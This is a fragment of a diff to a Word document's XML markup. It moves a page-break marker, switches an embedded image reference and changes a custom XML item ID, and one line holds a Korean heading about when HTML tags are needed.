@@ -1133,7 +1801,6 @@
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
@@ -3552,7 +4219,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill rotWithShape="1">
-                          <a:blip r:embed="rId8"/>
+                          <a:blip r:embed="rId9"/>
                           <a:srcRect b="10989"/>
                           <a:stretch/>
                         </pic:blipFill>
@@ -3772,6 +4439,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>HTML 태그 사용이 필요한 경우</w:t>
       </w:r>
     </w:p>
@@ -5497,7 +6165,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3E2E5BCD-74F5-4615-8157-3CB2514B71B0}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2FDD0792-C995-404D-9C22-848C3A61B514}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
